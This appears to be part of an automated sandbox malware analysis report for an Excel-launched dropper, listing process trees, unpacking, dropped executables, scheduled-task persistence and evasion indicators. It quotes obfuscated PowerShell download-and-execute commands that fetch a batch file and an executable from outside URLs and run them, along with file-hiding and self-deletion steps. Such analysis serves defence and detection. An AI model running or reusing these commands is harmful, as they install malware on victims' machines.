Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 18,1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\sp.exe 'C:\Users\user\AppData\Roaming\sp.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp' Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Roaming\sp.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Roaming\sp.exe {path} Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe 'C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\sp.exe Process created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe 'C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F59.tmp'
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Process created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe {path}
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JrekdQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpC70.tmp'
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\sp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2105935712.0000000002740000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122976252.0000000002840000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101619089.00000000028E0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2153192487.00000000029B0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Unpacked PE file: 31.2.eyBLwzbrUF1mwXoy.exe.b0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Unpacked PE file: 37.2.ars4t7gFPGrepVgh.exe.230000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Unpacked PE file: 31.2.eyBLwzbrUF1mwXoy.exe.b0000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Unpacked PE file: 37.2.ars4t7gFPGrepVgh.exe.230000.0.unpack
.NET source code contains potential unpacker
Source: sp.exe.23.dr, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: gUuYfpYBjYgU.exe.24.dr, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.0.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.2.sp.exe.bb0000.2.unpack, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 27.0.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 27.2.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 28.2.sp.exe.bb0000.2.unpack, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 28.0.sp.exe.bb0000.0.unpack, PuppetMaster/PuppetGUI.cs .Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat')
Source: unknown Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/jjfIQ8u','pd.bat') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;' Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe; Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_004F2AA7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 28_2_004F2AA7
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_004E6C16 push ecx; ret 24_2_004E6C2C
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 24_2_009817AF pushad ; iretd 24_2_009817B5
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_00682156 push ecx; ret 28_2_00682169
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006B08FC push eax; ret 28_2_006B091A
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_006B099C push ecx; ret 28_2_006B09AC
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0068118E push ecx; ret 28_2_006811A1
Source: C:\Users\user\AppData\Roaming\sp.exe Code function: 28_2_0042BBAE push eax; ret 28_2_0042BBAF
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_000B650A push ecx; retf 31_2_000B650D
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_000B60CC pushfd ; iretd 31_2_000B60D0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_000B4AD5 push edx; retf 31_2_000B4AF2
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_0048780D push ebx; retf 31_2_0048780E
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_00482B7A pushfd ; iretd 31_2_00482B7B
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 31_2_01F6AC61 push ebx; iretd 31_2_01F6AC62
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 34_2_000B650A push ecx; retf 34_2_000B650D
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 34_2_000B60CC pushfd ; iretd 34_2_000B60D0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Code function: 34_2_000B4AD5 push edx; retf 34_2_000B4AF2
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_0023650A push ecx; retf 37_2_0023650D
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_002360CC pushfd ; iretd 37_2_002360D0
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_00234AD5 push edx; retf 37_2_00234AF2
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A780D push ebx; retf 37_2_001A780E
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_001A2B7A pushfd ; iretd 37_2_001A2B7B
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Code function: 37_2_003EAC61 push ebx; iretd 37_2_003EAC62
Source: initial sample Static PE information: section name: .text entropy: 7.53751279368
Source: initial sample Static PE information: section name: .text entropy: 7.53751279368
Source: initial sample Static PE information: section name: .text entropy: 7.53751279368
Source: initial sample Static PE information: section name: .text entropy: 7.53751279368

Persistence and Installation Behavior:

barindex
Tries to download and execute files (via powershell)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe; Jump to behavior
Drops PE files
Source: C:\Users\user\AppData\Roaming\sp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\sp.exe File created: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\sp.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe File created: C:\Users\user\AppData\Roaming\JrekdQ.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\sp.exe File created: C:\Users\user\AppData\Roaming\gUuYfpYBjYgU.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\sp.exe File created: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\sp.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gUuYfpYBjYgU' /XML 'C:\Users\user\AppData\Local\Temp\tmpCF32.tmp'

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe File opened: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe:Zone.Identifier read attributes | delete
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
